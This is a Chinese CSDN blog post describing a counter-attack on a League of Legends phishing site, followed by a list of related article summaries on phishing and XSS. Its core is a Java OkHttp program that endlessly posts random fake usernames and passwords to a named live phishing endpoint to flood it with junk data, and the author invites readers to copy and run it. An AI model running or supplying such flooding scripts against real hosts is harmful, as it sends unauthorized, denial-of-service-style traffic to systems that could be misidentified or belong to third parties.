简单的攻击钓鱼网站

最新推荐文章于 2024-04-24 22:50:14 发布
最新推荐文章于 2024-04-24 22:50:14 发布
阅读量1.2k 收藏 4
点赞数
分类专栏: java 文章标签: java QQ盗号 java json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43328457/article/details/107318390
版权

分析好了目标url然后分析好了json即可,我这里演示一个英雄联盟的钓鱼网站,我差点就被钓到了,还好我看了一下域名。
直接上代码,我用的是Android库 OKhttp 在java也适用。
我的IP以及被服务器封了 有兴趣的小伙伴复制了之后直接运行一下呗 哈哈哈
直接不做人-希望人没事

public class Test {
    public static void main(String[] args) {
        int i =0;
        while (true){
            long id = (long) (Math.random()*1000000000);
            long pass = (long) (Math.random()*1000000000);

            String json="{\"u\":\""+id+"\",\"p\":\""+pass+"\",\"bianhao\":\"3\",\"add\":\"登录\"}";

            System.out.println(id);
            try {
                ++i;
                Response response = post(json);
                if(response.code()==200){
                    System.out.println("第"+i+"条,发送成功:用户名:"+id+" 密码:"+pass);
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
    private static final MediaType JSON = MediaType.parse("application/json; charset=utf-8");
    private static OkHttpClient client = new OkHttpClient();
    private static Response post(String json) throws IOException {
        RequestBody body = RequestBody.create(JSON, json);
        Request request = new Request.Builder()
                .url("http://ct0000.yixuedh.com/r/zq1/lol/test.php")
                .post(body)
                .header("Connection","close")

                .build();
        return client.newCall(request).execute();
    }
    
}
小傲傲i
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
6.5网络钓鱼攻击及防范方法.pptx
03-26
钓鱼网站简单的理解为不法分子为了实施网络攻击精心构造的具有欺诈性的特殊类型的网站,利用钓鱼网站实施的网络攻击称为网络钓鱼攻击
python攻击网站的方式_python web框架Flask——csrf攻击
weixin_39836876的博客
11-23 723
CSRF是什么?(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用也就是人们所知道的钓鱼网站。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相...
网络钓鱼攻击
qq_46484552的博客
06-10 824
网络钓鱼 网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息)的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。这些个人信息对黑客们具有非常大的吸引力,因为这些信息使得他们可以假冒受害者进行欺诈性金融交易,从而获得经济利益。受害者经常遭受严重的经济损失或个人信息被窃取。 攻破网
钓鱼网站规则提取工作的python代码重写总结
Pop_Rain的博客
05-16 902
0_originJson_writeURL_inTxt.py: import urllib.request import json origin_json_data = urllib.request.urlopen(r"http://www.txwz.qq.com/lib/index.php?m=enterprise&a=get_exsample").read() ndata = json.l
如何利用kali进行钓鱼网站攻击
v_14704的博客
10-02 901
4.输入你的kali密码,如果没设置,一般的kali密码为:kali。输入后它不会显示你的密码!这样,我们的攻击就已经完成了!如果要让别人访问你的钓鱼网站就要用到【内网穿透】的知识了!对了,我们是【三月七讲编程】,欢迎到QQ小世界来关注我哦~加作者QQ好友的:3651666752,这是作者的QQ哦~10.上面是告诉我们,咱们的IP,一定要记住!我们现在默认就行,也就是啥也别输入,回车就行!14.这时,我们刚刚kali告诉我们的IP就有用了!如果出现以下界面就代表克隆我们的钓鱼网站成功了,就已经开始钓鱼了!
6.2 网络钓鱼攻击
qq_55202378的博客
08-13 2万+
网络钓鱼 error
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2504
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
[网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及防御机理
热门推荐
杨秀璋的专栏
01-30 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了中间人攻击或ARP欺骗攻击,从ARP原理到局域网配置进行描述。这篇文章将详细讲解DNS欺骗(DNS投毒)及钓鱼网站原理知识,并通过Ettercap工具复现某购物网站的钓鱼漏洞,本文的重点是让您对ARP欺骗、DNS欺骗和钓鱼攻击有一定认识。真心希望这篇基础文章对您有所帮助,也欢迎大家讨论。
详细描述钓鱼网站攻击的过程
DelicateBoys的博客
06-09 1912
详细描述钓鱼网站攻击的过程 攻击原理: 钓鱼网站攻击是指在上网时引导用户访问精心伪造的虚假网站,骗取用户的个人信息。 典型攻击——QQ页面伪造钓鱼 1.攻击方式: 搭建类似QQ首页的网站,诱导用户点击,登录并获取用户信息。 2.攻击流程: (1)根据www.qq.com的页面元素,精心构造样式一样的网站; (2) 利用SEO,将伪造的网址置于搜索引擎结果页的首页位置; (3) 用户访问钓鱼网站,输入正确的QQ号和密码。此时已经获取到了基本的QQ号码信息; (4) 前三次无论输入任何号码和密码都反馈用户输入错
钓鱼手法简单总结 简单说说钓鱼手法
04-20
以下是钓鱼手法的简单介绍: 伪装:钓鱼者通常会伪造电子邮件、网站或其他通信渠道,使其看起来像是来自可信的实体,如银行、电子支付平台、社交媒体或在线商店等。这样可以让受害者误认为这些请求是合法的。 欺骗...
使用机器学习方法检测钓鱼网站-研究论文
06-10
这可以基于网络钓鱼网站的独特功能来完成,用户无需检查单个网站。 相反,我们可以通过提取一些独特的特征来识别和预测网络钓鱼、可疑和合法网站。 这项工作的目的是开发保护用户免受网络钓鱼攻击的模型。 在本文中...
防止网络钓鱼攻击的保护系统-研究论文
06-10
在本文档中,我们提出了一种新策略来对网络钓鱼网站进行分类以解决网络钓鱼问题。 网络钓鱼网站包括在其内容组件中与网站结合提供的各种标志以及基于浏览器的安全指数。 研究图像的使用通过将原始验证码图像分解为...
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
string模拟实现
m0_73969414的博客
04-23 1215
c++中string的模拟实现,面试必会知识点
【1524】java投票管理系统Myeclipse开发mysql数据库web结构java编程计算机网页项目
qq_251836457的博客
04-18 945
2、开发环境为TOMCAT7.0,Myeclipse8.5开发,数据库为Mysql5.0,使用java语言开发。(5)投票选项管理:对投票选项信息进行添加、删除、修改和查看。(6)投票记录管理:对投票记录信息进行添加、删除、修改和查看。(1)管理员管理:对管理员信息进行添加、删除、修改和查看。(2)用户管理:对用户信息进行添加、删除、修改和查看。(3)公告管理:对公告信息进行添加、删除、修改和查看。(4)投票管理:对投票信息进行添加、删除、修改和查看。4)投票浏览查看、查看投票、投票记录。
javaweb-SpringBoot基础
kussm_的博客
04-20 1145
Spring的官网(Spring的简介:Spring makes Java simple。Spring Boot 可以帮助我们非常快速的构建应用程序、简化开发、提高效率。创建一个子包controller。
MSE实现全链路灰度实践
最新发布
云计算、数据库、大数据、深度学习、NLP、Python
04-24 134
待更新。
Web前端 Javascript笔记5
cycyzh的博客
04-18 1014
script>'console.log("哈哈哈佳人们好困")'}, 3000)​let t1 = setTimeout('console.log("你们看到这句话的时候我早已身价百万!!")', 4000)​</script>3秒,四秒后出来的东西,出现前会返回计时器编号。
2.8 构建gradle环境
蚊者逆袭的博客
04-18 2291
Gradle是一种现代化的构建工具,用于自动化地构建、测试和部署软件项目。它是一种基于JVM(Java虚拟机)的构建工具,最初是为了解决Apache Ant和Apache Maven等传统构建工具的一些限制而开发的。
使用php语言生成一个钓鱼网站
06-08
请注意,本回答仅限于学术研究和安全测试目的。钓鱼行为是违法的,不应该用于非法目的。...请注意,这只是一个非常简单的示例,真正的钓鱼网站可能会更加复杂和危险。再次提醒,钓鱼行为是违法的,请勿用于非法目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值